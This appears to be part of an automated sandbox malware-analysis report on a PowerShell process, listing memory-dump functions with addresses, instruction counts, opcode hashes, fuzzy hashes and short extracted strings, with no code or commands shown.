                            • Opcode ID: 067347912899cf134a9cd40999e369645bc6745ea1ca7420181c71acfc108ebc
                            • Instruction ID: 01d9a218792badc9979a74cbeedf87f190a8da13d764aa3b04fef8d788ebf4dd
                            • Opcode Fuzzy Hash: 067347912899cf134a9cd40999e369645bc6745ea1ca7420181c71acfc108ebc
                            • Instruction Fuzzy Hash: ADD15C34E002059FCB14EF64C0A4A6EB7B3FF88318F958968D50A9B355DB74ED4ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: powershell.exe PID: 4832 Parent PID: 6084 powershell.exeCOMMON

                            Executed Functions

                            Function 033A3EE8, Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e
                            • API String ID: 0-963420031
                            • Opcode ID: 7618a82afc57a55974dce11b9d334052ed009ce72ae4809300f3fcacd7102c3b
                            • Instruction ID: 41138b2c2127ebf27002f58ac339c2caf5c8197f606765a8c48ef086347abbc8
                            • Opcode Fuzzy Hash: 7618a82afc57a55974dce11b9d334052ed009ce72ae4809300f3fcacd7102c3b
                            • Instruction Fuzzy Hash: A4327F38A00609CFCB04DFA9C894AAEBBF2FF88315F148469D805AB355DB74ED46CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 050E71B0, Relevance: 1.7, Instructions: 1650COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.937805072.00000000050E0000.00000040.00000001.sdmp, Offset: 050E0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a3dd8aac3b6dea89aca99f9027f6e53b039cc2a0b0c28cb33ac3798812c6f9a
                            • Instruction ID: 1f8d2a392dc06a87ea6b584a40c99bf626b89dfedcb86246fd5c30ee82e1c1ef
                            • Opcode Fuzzy Hash: 7a3dd8aac3b6dea89aca99f9027f6e53b039cc2a0b0c28cb33ac3798812c6f9a
                            • Instruction Fuzzy Hash: 4B030E38A00218DFDB25DF60D854B9EBB73EB88305F5080A9D60A6B794CF35AE91DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 050E71C0, Relevance: 1.6, Instructions: 1645COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.937805072.00000000050E0000.00000040.00000001.sdmp, Offset: 050E0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dad4d8c1756324614b9e981e7803309898aa7ba5315cbbc73bf75631caf69864
                            • Instruction ID: de3edf60a72880e97fee17555708f482000d7e554414bbbd32350498675900ef
                            • Opcode Fuzzy Hash: dad4d8c1756324614b9e981e7803309898aa7ba5315cbbc73bf75631caf69864
                            • Instruction Fuzzy Hash: E4030D38A00218DFDB25DF60D854B9EBB73EB88305F5080A9D60A6B794CF35AE91DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AB8F8, Relevance: .7, Instructions: 664COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6a29d526325b6f019ef90e600ea90e626d027dc8fbd4f44d4f0ea7183b20d0e
                            • Instruction ID: a339dbfabc49bacf63215644cb56232d4f4ad395e43d8155db33275caf063762
                            • Opcode Fuzzy Hash: c6a29d526325b6f019ef90e600ea90e626d027dc8fbd4f44d4f0ea7183b20d0e
                            • Instruction Fuzzy Hash: 49426E34A00608DFDB25DF78C894AAEFBB6EF89310F188569D905AB351DB34ED41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C6F50, Relevance: .6, Instructions: 634COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3780a8aff6ff2a49d559991e082c0558d8ed7b7e7a9365db0032fd71c2fb0b57
                            • Instruction ID: 9efaa256f40228587f49e69ce155279811158ff6ee8e1e099d6f095f20b507f0
                            • Opcode Fuzzy Hash: 3780a8aff6ff2a49d559991e082c0558d8ed7b7e7a9365db0032fd71c2fb0b57
                            • Instruction Fuzzy Hash: A942AE34A00719DFEB25DF64C850BAAB772EF89704F1081AAE9097B391DB719D81CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B4B00, Relevance: .6, Instructions: 579COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80882dbd8ef46ba43e32d5bae7dcb6d21ac1c9927049ddfa0979ab335d1f0b8d
                            • Instruction ID: 2c49c854a1940c720258a9102e1934ade3828ed15cff7cf6874e47c9d060ff3b
                            • Opcode Fuzzy Hash: 80882dbd8ef46ba43e32d5bae7dcb6d21ac1c9927049ddfa0979ab335d1f0b8d
                            • Instruction Fuzzy Hash: CB424A34A01218CFDB24DF25C894BADB7B2FF89305F1485A9D90AAB791DB359E81CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C6F40, Relevance: .4, Instructions: 366COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd69c967cf23b0ce77f3006ad960f0120e059d00aedfe6e55d4976635bf7620a
                            • Instruction ID: 06077519df78f2184075233c0eadd284909acb4d7905134f2286b0f6f8d70a7a
                            • Opcode Fuzzy Hash: bd69c967cf23b0ce77f3006ad960f0120e059d00aedfe6e55d4976635bf7620a
                            • Instruction Fuzzy Hash: 9AE1AF34A00719DFEB25DF64C850BAEB772EF89704F1081AAD5097B391DB719D818FA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C8C40, Relevance: 7.7, Strings: 6, Instructions: 239COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: Hr f$Hr f$Hr f$Hr f$Hr f$Hr f
                            • API String ID: 0-1400482658
                            • Opcode ID: 8442aba1b0e3650047dc526507c8afad0516338b71780503e27036a1a48fcd4a
                            • Instruction ID: ee259107ed51b8b22409fe0bd8b22d0081a5a206e77d81d59b19c4794d8f4f79
                            • Opcode Fuzzy Hash: 8442aba1b0e3650047dc526507c8afad0516338b71780503e27036a1a48fcd4a
                            • Instruction Fuzzy Hash: 3E917D78A002059FD714DF68C490AAEBBB2EF89314F14C96ED5099F751CB31ED4ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B2DF0, Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: "$h? f
                            • API String ID: 0-790041044
                            • Opcode ID: fe01b0894986a53466e8fb027f2c9a026a00bfdb6627de76e24c0f36cb4fed3e
                            • Instruction ID: 2bb921d02cbf9e1482fd1830732d356b51b6b25bcb7581645766ae03bc673444
                            • Opcode Fuzzy Hash: fe01b0894986a53466e8fb027f2c9a026a00bfdb6627de76e24c0f36cb4fed3e
                            • Instruction Fuzzy Hash: 9AE1EA34A002099FDB14DFA5C984BEDB7F6EF88304F1485A9DA05AB391DB72AD45CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A5BE8, Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e$`o(e
                            • API String ID: 0-1000540072
                            • Opcode ID: 9757b2a159bd43309ee4fde461bafc3fb45458fb464ba235651e735737c26e86
                            • Instruction ID: a364605c0e93890fc12c0deb68b49fb6ab7c286dca7444c37f07d65059bc8f13
                            • Opcode Fuzzy Hash: 9757b2a159bd43309ee4fde461bafc3fb45458fb464ba235651e735737c26e86
                            • Instruction Fuzzy Hash: F991B034A00604DFE710DF68D4D4AAEB7F2EF8A314F148469D546AB395CB31ED45CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AD2E8, Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e$`o(e
                            • API String ID: 0-1000540072
                            • Opcode ID: bd042fbc33ed7b079813f5522f1f6bf81524a7e2a94d275f1387d51837dcc14f
                            • Instruction ID: 0fced119108cec4974e8199e793c4affcc5e2beed39224287c6c26e631787be1
                            • Opcode Fuzzy Hash: bd042fbc33ed7b079813f5522f1f6bf81524a7e2a94d275f1387d51837dcc14f
                            • Instruction Fuzzy Hash: EE813634A01609DFCB14DF68D494A9DBBF2FF48314F1589A9E505AB362DB34ED45CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AD873, Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e$`o(e
                            • API String ID: 0-1000540072
                            • Opcode ID: dad7689fe11086202f863f17083d1d7c91161aa10e152ee3e7ea83bfe8ca3fe2
                            • Instruction ID: 70a646b76f3999dae7a484108fdd2af177f1a4406a1d7445a8b41280b04146d6
                            • Opcode Fuzzy Hash: dad7689fe11086202f863f17083d1d7c91161aa10e152ee3e7ea83bfe8ca3fe2
                            • Instruction Fuzzy Hash: D1611734A00704DFCB14DF68C4A4A6DBBB2FF89315F5488ACD4469F6A5DB35E985CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A52A8, Relevance: 1.8, Strings: 1, Instructions: 502COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e
                            • API String ID: 0-963420031
                            • Opcode ID: e00e3f67363df1bc53449c152704d84daa7f344a0bf308777eb2cef44943555d
                            • Instruction ID: be19a5e6a46a797373ef7af56fa30736db3f8a94f61a9dadd449372add240a15
                            • Opcode Fuzzy Hash: e00e3f67363df1bc53449c152704d84daa7f344a0bf308777eb2cef44943555d
                            • Instruction Fuzzy Hash: BD225A34A00A09CFDB14DF68C884A99BBF2FF89315F15C999D849AB251DB34ED85CF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B0E80, Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e
                            • API String ID: 0-963420031
                            • Opcode ID: 1d52f06544d9d5b2d4566127c98a6ba32e96ba37fc6a771103e22aa70360145f
                            • Instruction ID: 5e7b406059fb3074577b9c9e1fe3d7a33b906fd404ae7d04a5f74f6fbf874b80
                            • Opcode Fuzzy Hash: 1d52f06544d9d5b2d4566127c98a6ba32e96ba37fc6a771103e22aa70360145f
                            • Instruction Fuzzy Hash: D7B11338A00608CFCB14DF98C594A9EBBF2EF48314F258599E905AB761C774FD46CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B133B, Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e
                            • API String ID: 0-963420031
                            • Opcode ID: a2b4496a8c3354de6640dec433a21dc11a4448e4c2d2d31cc6c5ea9102e1002d
                            • Instruction ID: 9936afa76bc7ccf0fefe7946011f5b7568cb351792baa81d222f3909dae1fbc7
                            • Opcode Fuzzy Hash: a2b4496a8c3354de6640dec433a21dc11a4448e4c2d2d31cc6c5ea9102e1002d
                            • Instruction Fuzzy Hash: 1F816A34E00604DFCB10DB68D894BDDBBF2EF89311F1884AAD905AB6A1DB34E945CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B4700, Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: Hr f
                            • API String ID: 0-432337727
                            • Opcode ID: 859b6d5903046e01caf492a3dc352a04d55f983ccf8c77a51b530c173cc3fc7a
                            • Instruction ID: 4f5401f98116a1ad645cb98782bb980bb29895207e5dfa8532635ca9b819bdd0
                            • Opcode Fuzzy Hash: 859b6d5903046e01caf492a3dc352a04d55f983ccf8c77a51b530c173cc3fc7a
                            • Instruction Fuzzy Hash: C4819E38A00208DFCB10CF69D884AEDBBF2EF88304F148969E509AB761D771ED45CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C8590, Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: pi f
                            • API String ID: 0-1009283040
                            • Opcode ID: 64931ff6a92f02c0c46484fc186a06f639caf665007a949cfc2b9a0d4b1c548c
                            • Instruction ID: bf4313973c235756e39d0c0a4b2ff65adbc78bf819b6db88c31861690b5b97f2
                            • Opcode Fuzzy Hash: 64931ff6a92f02c0c46484fc186a06f639caf665007a949cfc2b9a0d4b1c548c
                            • Instruction Fuzzy Hash: 1A513BB4A416059FDB14DF64D894BAEBBF2BF88304F14856DE806EB2A4DB34DC45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C85A0, Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: pi f
                            • API String ID: 0-1009283040
                            • Opcode ID: 7816daf3017ef86a2c12b99af2c6be49a98793263f4497af8f666bbde69df225
                            • Instruction ID: cb447f006810a9d3334b232bfc868a53b29effa35792a3ea7001e871efc0a24a
                            • Opcode Fuzzy Hash: 7816daf3017ef86a2c12b99af2c6be49a98793263f4497af8f666bbde69df225
                            • Instruction Fuzzy Hash: B4513BB4A406059FDB14DF64D894BAEBBF2BF88304F148569E406EB3A0DB34EC41CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 050EFC28, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.937805072.00000000050E0000.00000040.00000001.sdmp, Offset: 050E0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: dl f
                            • API String ID: 0-3851972035
                            • Opcode ID: 2a7013e2fcee19b980816f840d1f9c87c5e0426b9c2ff8f8b951d87307b7ca18
                            • Instruction ID: 3dc6b409466e8292ffe9e46caa9f11bc2ceb86938d21128c3dcfd54fe3283710
                            • Opcode Fuzzy Hash: 2a7013e2fcee19b980816f840d1f9c87c5e0426b9c2ff8f8b951d87307b7ca18
                            • Instruction Fuzzy Hash: 3E41D276700A158FCB14DF78D8506AEBBE2FF85364F104A6AC601DF290DB71EA148BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AC810, Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: `o(e
                            • API String ID: 0-963420031
                            • Opcode ID: 19c154041e1e2db9e8ebc90cc7a01fe06ca2165f54897c24499baa7c23965c08
                            • Instruction ID: f98236ee9bfc07be33a958b243dd77d5ea6501e126696e3ca1513f476ef725f8
                            • Opcode Fuzzy Hash: 19c154041e1e2db9e8ebc90cc7a01fe06ca2165f54897c24499baa7c23965c08
                            • Instruction Fuzzy Hash: 72510038A006098FCB14CF68C590AAEB7F1FF4C214F158999D955AB365D771EE05CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 050E9230, Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.937805072.00000000050E0000.00000040.00000001.sdmp, Offset: 050E0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: 8^ f
                            • API String ID: 0-1135406119
                            • Opcode ID: 5eca558432bd896e3e25cf59b2c1f6737f9a4357f086bbf281bb0654113e70cf
                            • Instruction ID: 63a6be9fda24c7875e4c5b4e957a96f457efb6a21bcf2d038e9d09288fafe2b9
                            • Opcode Fuzzy Hash: 5eca558432bd896e3e25cf59b2c1f6737f9a4357f086bbf281bb0654113e70cf
                            • Instruction Fuzzy Hash: BAF081323042245FDB649AA9A884A6EB7D9EBC8625B25053AE509CB280DF72DC428791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 050E9220, Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.937805072.00000000050E0000.00000040.00000001.sdmp, Offset: 050E0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: 8^ f
                            • API String ID: 0-1135406119
                            • Opcode ID: 22fc5f357175dc3dbd577c580f70a43e97d3e7151c3c16253bdbeb59a8737d45
                            • Instruction ID: af3f232cf9095eaaeede8bd04a9926a6d6d5a27075bdf30b407a00172efa7144
                            • Opcode Fuzzy Hash: 22fc5f357175dc3dbd577c580f70a43e97d3e7151c3c16253bdbeb59a8737d45
                            • Instruction Fuzzy Hash: 8401F4327042159FD720CFB8E88492ABBE9EFC9314B15046EE505DB291DF71DC02C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B6338, Relevance: .5, Instructions: 498COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e35533f30945293ed2aa346380cbaf28c70854d36ec32c6514ed1b33d4a2c4a
                            • Instruction ID: e07f0f3591b2b5ed213c81861551b54d4bc4053d187f4daff61369a05772500e
                            • Opcode Fuzzy Hash: 0e35533f30945293ed2aa346380cbaf28c70854d36ec32c6514ed1b33d4a2c4a
                            • Instruction Fuzzy Hash: 4F12E230E00505EFC711DF29C8D59AEFBB2FF49700B198566E619ABA62C731EC90CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078CF2C0, Relevance: .4, Instructions: 385COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 85d523dd62a87dce80fb832ace7a09ebd40ee81e4803289a0baf03865aad92b2
                            • Instruction ID: b0ccaedfda0213c1e1ddaa7801b246471b2d3ff1f3a5bbb99db98dd2ac379f22
                            • Opcode Fuzzy Hash: 85d523dd62a87dce80fb832ace7a09ebd40ee81e4803289a0baf03865aad92b2
                            • Instruction Fuzzy Hash: 3AE1DF75A003499FDB14CF64C450AAEBBF2EF89314F14886EEA05DB351DB74E94ACB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AB308, Relevance: .3, Instructions: 322COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6113a57de0eb49e21ea4625b2e1a5c80846195ed68d363cab14f216b40771b5d
                            • Instruction ID: a02a8b54a04771464da4d337484998e091a223e4682193841db08bc7d72d0730
                            • Opcode Fuzzy Hash: 6113a57de0eb49e21ea4625b2e1a5c80846195ed68d363cab14f216b40771b5d
                            • Instruction Fuzzy Hash: B2D19D34A00704DFDB14DF68D894BAEBBB2EF88314F188469E506AB3A0CB75AD45CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B2368, Relevance: .3, Instructions: 322COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a6364977c4c94be34c57e56edda75a0af0ae1995302106eade117ba51c65d00
                            • Instruction ID: 260ace25617b41c89a58cb4ba1ec9ab6f03280f05139a000d64c2e123b8df7cb
                            • Opcode Fuzzy Hash: 3a6364977c4c94be34c57e56edda75a0af0ae1995302106eade117ba51c65d00
                            • Instruction Fuzzy Hash: 5EE1FA78A002058FCB04DF65C59499EBBF6BF8C324F1956A4D905AB766DB30EC85CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078CF910, Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4411d895327d7dbd76b7aa8e1e4105a09f8133ccaaea7e60381d7d14c55a6201
                            • Instruction ID: a9c0ed55c2a18ec43d18b18b219a2d5194fb9ac0812a7716fd8b1ef146924ce2
                            • Opcode Fuzzy Hash: 4411d895327d7dbd76b7aa8e1e4105a09f8133ccaaea7e60381d7d14c55a6201
                            • Instruction Fuzzy Hash: 3AC1F075A003499FDB14CFA5C454AAEBBF2EF88314F14846EE905AB391CB34ED46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B1AF8, Relevance: .3, Instructions: 284COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1cd31973a3f58e01ef0235bd69d4248878e7000ee9f7f6d527db2d0a7bfa61b
                            • Instruction ID: 7b5c1e38e4e257c01b92d96acc9d9e941c2265ba078ae515ffd19d16b6bbbd1f
                            • Opcode Fuzzy Hash: e1cd31973a3f58e01ef0235bd69d4248878e7000ee9f7f6d527db2d0a7bfa61b
                            • Instruction Fuzzy Hash: FAB1AB74B006049FCB05DF65C890ABEBBF6FF88245F188469EA06DB354DB74AD11CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A3AB8, Relevance: .3, Instructions: 279COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0bc0df21d1444112fe2cb3486b639f69808257101c34c094265de72a04b18b56
                            • Instruction ID: 94bbd4449d8314ca79b5e1f72784bda0c58c73f1b0a4c31b837b7b814d89ef67
                            • Opcode Fuzzy Hash: 0bc0df21d1444112fe2cb3486b639f69808257101c34c094265de72a04b18b56
                            • Instruction Fuzzy Hash: 21B14E38A00604DFDB14DFA9D894BADBBF6EF88720F148469E505AB764DB35EC41CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A9CA8, Relevance: .3, Instructions: 269COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d6e875b1b2fc3831811cb184a497baa999081f99a3177516ea698156cc65299
                            • Instruction ID: d1fae371ff5583db33df8fe5ff1c546c848ea8aa036ddebb16dcd57dfe95ceb7
                            • Opcode Fuzzy Hash: 8d6e875b1b2fc3831811cb184a497baa999081f99a3177516ea698156cc65299
                            • Instruction Fuzzy Hash: C4B13B74A026059FCB04DF68DA80A9DBBF2FF88314B2546A9E4059F3A5DB70ED41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B3BA8, Relevance: .3, Instructions: 266COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9ac7e233bafddbf02d31ed631bf6a86fe63cbd4a1490b9962a089369893f61b3
                            • Instruction ID: 9a2b4705927cfbfa9beac94ba9bcb34bab8c3e3cdf17aa27af3f762006fb3c7a
                            • Opcode Fuzzy Hash: 9ac7e233bafddbf02d31ed631bf6a86fe63cbd4a1490b9962a089369893f61b3
                            • Instruction Fuzzy Hash: 6CB17D75A00218EFCB14DFA4D884AEEBBB6FF88310F148569E505EB390DB31AD52CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B6E78, Relevance: .2, Instructions: 249COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b608f1f7ce742bd82a88e9d098e8148b64bc59088a18661303743b760d86bd34
                            • Instruction ID: 550328fedfaf308c681117d364905d4c4811990941e3e1b66421346bb8c4298b
                            • Opcode Fuzzy Hash: b608f1f7ce742bd82a88e9d098e8148b64bc59088a18661303743b760d86bd34
                            • Instruction Fuzzy Hash: 5481A139B005049FDB14DF65D880AAEBBE6EFC9314F15807AE509AF751DB35DC018B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A3680, Relevance: .2, Instructions: 243COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9a44bcffb213662f0c04f00378da2391576ed647a35cf942c90b5fbdd984207a
                            • Instruction ID: 9db8a64d5b13f56048fb2d1d66e3417cd5ec814b7866ef50ae7050fd40b58c0a
                            • Opcode Fuzzy Hash: 9a44bcffb213662f0c04f00378da2391576ed647a35cf942c90b5fbdd984207a
                            • Instruction Fuzzy Hash: DDA18339E00719DFCB14DF68C884B9EB7B2EF89324F158699D408AB215DB70AE85CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B2359, Relevance: .2, Instructions: 216COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da21c03d8a9688062c4168e86711eda2e1a6b49d7485acdf7d62db2375edb44b
                            • Instruction ID: a2509ca39d46a62496753820e141be166c51c35f5f5077d5e8949fdd9fe183a7
                            • Opcode Fuzzy Hash: da21c03d8a9688062c4168e86711eda2e1a6b49d7485acdf7d62db2375edb44b
                            • Instruction Fuzzy Hash: 76A10978A002058FCB04DF65C584DDABBF2BF8C324F1996A5D805AB7A6D730E885CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AC4E0, Relevance: .2, Instructions: 214COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f7dec8888332007e774f163adaebb320511307f21a298cea87d393ea49af2e5
                            • Instruction ID: eaa41fe50f14fb0837f888b7c158d3440ac8cd086df924309c02a3f47636f6ad
                            • Opcode Fuzzy Hash: 6f7dec8888332007e774f163adaebb320511307f21a298cea87d393ea49af2e5
                            • Instruction Fuzzy Hash: DB81A2397006018FDB25DF65E89876AB7B7FB88301F04442DE506DB7A4CF74A996CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033AAD98, Relevance: .2, Instructions: 194COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
